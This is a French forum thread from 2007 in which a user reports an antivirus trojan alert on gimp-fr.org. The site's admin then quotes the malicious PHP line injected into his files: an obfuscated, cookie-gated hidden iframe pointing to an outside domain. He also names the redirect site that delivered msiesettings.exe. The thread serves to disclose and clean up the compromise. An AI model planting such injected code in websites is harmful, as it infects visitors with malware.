Voir les messages sans réponses | Voir les sujets actifs Nous sommes le 09 Déc 2019, 18:43



Répondre au sujet  [ 5 messages ] 
Menace 
Auteur Message
Nouveau venu
Nouveau venu

Inscription: 23 Juin 2007, 00:02
Messages: 1
Répondre en citant le message
Message Menace
Bonjour,
tout d'abord pardonner moi si je ne suis pas au bon endroit, mais je n'est rien trouver d'autre ou exposer ma decouverte.

donc voila j'ai remarquer un menace de trojant windows sur http://www.gimp-fr.org

ci join un screen shot de l'erreur relever par nod32
http://ged.forla.eu/dir/lu6fer/menace.jpg (menace ou pas, les images de 1680*1050 méritent un simple lien ... )

desoler amis linuxien, mais il arrive que de temps en temps, le coté obscure de la force infiltre mon pc... :)
a bon entendeur...

encore desoler si ce n'est pas quelque chose d'inportant, ou pas au bon endroit.


23 Juin 2007, 00:13
Profil
Administrateur
Administrateur
Avatar de l’utilisateur

Inscription: 28 Avr 2004, 08:23
Messages: 2103
Localisation: Toulouse
Répondre en citant le message
Message 
salut,

je transfère dans la section Gimp de nos forums, en espérant que le webmestre de gimp-fr soit dans les parages...

merci pour l'info

amicalement

raymond? tu es par là?


23 Juin 2007, 00:21
Profil ICQ YIM Site Internet
Administrateur
Administrateur
Avatar de l’utilisateur

Inscription: 05 Aoû 2005, 15:24
Messages: 757
Localisation: Bretagne
Répondre en citant le message
Message 
Je rappelle qu'il y a une adresse de contact dans la section A Propos de gimp-fr

Et je doute fortement que le problème vienne de ce site en particulier (y'a rien qui ressemble à ça sur la page, mais bon, ça fait tellement longtemps que je n'ai pas entendu parler de virus :] )


23 Juin 2007, 09:16
Profil Site Internet
Admin de Gimp-fr

Inscription: 25 Aoû 2004, 18:09
Messages: 707
Localisation: Strasbourg
Répondre en citant le message
Message 
J'ai bien trouvé une ligne ajoutée dans un de mes fichiers :
Code:
if (!isset($_COOKIE["gho"])) echo '<ifra'.'me src=http:/'.'/google'.'rank.info/cou'.'nter style=display:none></ifra'.'me> <script '.'la'.'ngu'.'age'.'="JavaScript" type="tex'.'t/javascript"'.'>d'.'oc'.'umen'.'t.c'.'ookie = "gho=7;expire'.'s=Sun, 01-Dec-2009'.' 08:00:00 GMT;path'.'=/";</script>';


Puis une 2ème.

Celles-ci ont déposé deux cookies dans le navigateur que vous devez effacer.
Les cookies sont classés dans gimp-fr.org et nommés ymit et gho.

Ensuite la victime est redirigée vers le site http://msiesettings.com/... (qui prétend être indisponible mais ne l'est pas) et active le malware msiesettings.exe

@+


23 Juin 2007, 11:05
Profil Site Internet
Nouveau venu
Nouveau venu

Inscription: 17 Oct 2007, 18:42
Messages: 1
Localisation: Paris
Répondre en citant le message
Message On ne le dira pas assez
Bonjour

On ne le dira pas assez :
Utilisez des logiciels fiables et resistants aux virus, lrosque vous surfez sur internet.

Mozilla/Firefox/Iceweasel sont excellents, et, donnent un bon rendu des pages web contrairement aux produits MS.

Bien que cette annonce soit "périmée", si vous voulez de la sécurité, passez sous Linux, c'est bien plus facile à sécuriser.

A bientôt
GG


19 Oct 2007, 20:08
Profil
Afficher les messages postés depuis:  Trier par  
Répondre au sujet   [ 5 messages ] 

Qui est en ligne

Utilisateurs parcourant ce forum: Google [Bot] et 1 invité


Vous ne pouvez pas poster de nouveaux sujets
Vous ne pouvez pas répondre aux sujets
Vous ne pouvez pas éditer vos messages
Vous ne pouvez pas supprimer vos messages

Rechercher:
Aller à:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group.
Forum style by ST Software for PTF.
Traduction par: phpBB-fr.com